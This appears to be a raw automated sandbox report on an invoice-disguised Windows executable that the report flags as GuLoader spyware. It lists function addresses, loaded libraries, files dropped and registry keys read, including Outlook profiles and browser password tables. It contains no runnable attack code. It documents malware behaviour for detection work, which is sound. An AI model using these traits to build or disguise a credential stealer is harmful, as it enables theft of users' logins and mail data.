          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E9AB712_2_380E9AB7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E9AC812_2_380E9AC8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E7B0012_2_380E7B00
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EFB0112_2_380EFB01
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E3B1F12_2_380E3B1F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EE31712_2_380EE317
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E7B1012_2_380E7B10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E5B1012_2_380E5B10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EE32812_2_380EE328
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E5B2012_2_380E5B20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E3B3012_2_380E3B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E9F4912_2_380E9F49
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E9F5812_2_380E9F58
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E7F8F12_2_380E7F8F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E7FA012_2_380E7FA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E5FA012_2_380E5FA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E5FB012_2_380E5FB0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E3FB012_2_380E3FB0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E3FC012_2_380E3FC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EE7DF12_2_380EE7DF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EA3D812_2_380EA3D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EA3E812_2_380EA3E8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EBBE012_2_380EBBE0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EBBF012_2_380EBBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380EE7F012_2_380EE7F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F185012_2_380F1850
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FF8D812_2_380FF8D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F8D8812_2_380F8D88
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F4A8812_2_380F4A88
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FF2A012_2_380FF2A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FC72812_2_380FC728
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F23D012_2_380F23D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FCC1012_2_380FCC10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F002312_2_380F0023
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FCC2012_2_380FCC20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F184112_2_380F1841
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F004012_2_380F0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FD11812_2_380FD118
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FD5EC12_2_380FD5EC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F85F012_2_380F85F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F860012_2_380F8600
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FD61012_2_380FD610
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FDA5912_2_380FDA59
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FDA6812_2_380FDA68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F4A7912_2_380F4A79
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F967812_2_380F9678
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FDEBF12_2_380FDEBF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FDEC012_2_380FDEC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F0B2012_2_380F0B20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FE33F12_2_380FE33F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F0B3012_2_380F0B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FE34012_2_380FE340
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FE78812_2_380FE788
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FE79812_2_380FE798
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F8FA812_2_380F8FA8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F23C012_2_380F23C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380FEBF012_2_380FEBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BF26812_2_392BF268
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B8AE812_2_392B8AE8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B2B3812_2_392B2B38
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B433012_2_392B4330
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B050812_2_392B0508
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B730012_2_392B7300
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5B1812_2_392B5B18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B431F12_2_392B431F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5B1112_2_392B5B11
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B696012_2_392B6960
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B136012_2_392B1360
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B517912_2_392B5179
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B697012_2_392B6970
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B814812_2_392B8148
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B2B4812_2_392B2B48
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B815812_2_392B8158
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B39A012_2_392B39A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B21A712_2_392B21A7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B77B912_2_392B77B9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B21B812_2_392B21B8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BF58812_2_392BF588
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B518812_2_392B5188
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B398F12_2_392B398F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B47E812_2_392B47E8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5FE012_2_392B5FE0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B47F812_2_392B47F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B2FFF12_2_392B2FFF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B77C812_2_392B77C8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BFBC812_2_392BFBC8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B09C012_2_392B09C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B5FD012_2_392B5FD0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B09D012_2_392B09D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B182812_2_392B1828
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B6E2812_2_392B6E28
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B862012_2_392B8620
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B6E3812_2_392B6E38
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B181912_2_392B1819
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B861012_2_392B8610
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B301012_2_392B3010
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B001712_2_392B0017
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B3E6812_2_392B3E68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BA66812_2_392BA668
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B266F12_2_392B266F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B7C7F12_2_392B7C7F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B564112_2_392B5641
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B004012_2_392B0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B3E5812_2_392B3E58
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B565012_2_392B5650
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B64A812_2_392B64A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392BF8A812_2_392BF8A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B4CB212_2_392B4CB2
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B0E8912_2_392B0E89
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B268012_2_392B2680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B0E9812_2_392B0E98
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B7C9012_2_392B7C90
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B649712_2_392B6497
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B1CE112_2_392B1CE1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B04F812_2_392B04F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B72F112_2_392B72F1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B1CF012_2_392B1CF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B34CA12_2_392B34CA
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B4CC012_2_392B4CC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B8AD812_2_392B8AD8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392B34D812_2_392B34D8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C6DA012_2_392C6DA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CE46012_2_392CE460
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C6A8012_2_392C6A80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C2F2012_2_392C2F20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C612012_2_392C6120
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C932012_2_392C9320
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CC52012_2_392CC520
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C130012_2_392C1300
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C450012_2_392C4500
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C770012_2_392C7700
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CA90012_2_392CA900
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CDB0012_2_392CDB00
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C2F1212_2_392C2F12
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C036012_2_392C0360
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C356012_2_392C3560
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C676012_2_392C6760
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C996012_2_392C9960
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392CCB6012_2_392CCB60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_392C837012_2_392C8370
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: String function: 00402A3A appears 50 times
          Source: FACTURAS_1_250075.exe, 00000000.00000002.1916047297.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe, 0000000C.00000000.1913214803.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2543957485.0000000035D97000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exeBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs FACTURAS_1_250075.exe
          Source: FACTURAS_1_250075.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/25@5/5
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040431C
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040205E
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile created: C:\Users\user\Slutafregningers175Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeMutant created: NULL
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile created: C:\Users\user\AppData\Local\Temp\nsv26C7.tmpJump to behavior
          Source: FACTURAS_1_250075.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2236393385.0000000037115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: FACTURAS_1_250075.exeVirustotal: Detection: 70%
          Source: FACTURAS_1_250075.exeReversingLabs: Detection: 71%
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile read: C:\Users\user\Desktop\FACTURAS_1_250075.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess created: C:\Users\user\Desktop\FACTURAS_1_250075.exe "C:\Users\user\Desktop\FACTURAS_1_250075.exe"Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile written: C:\Users\user\Slutafregningers175\ammunitionsfabrikkers\Moussens\Enculturating.iniJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: FACTURAS_1_250075.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: Process Memory Space: FACTURAS_1_250075.exe PID: 7468, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.1917413249.000000000531D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_3_0583EE8C push eax; iretd 12_3_0583EEA9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_3_0583CF4C push eax; iretd 12_3_0583CF4D
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_3_0583EE64 push eax; iretd 12_3_0583EE65
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380F38E8 pushfd ; iretd 12_2_380F38E9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeFile created: C:\Users\user\AppData\Local\Temp\nsx3725.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
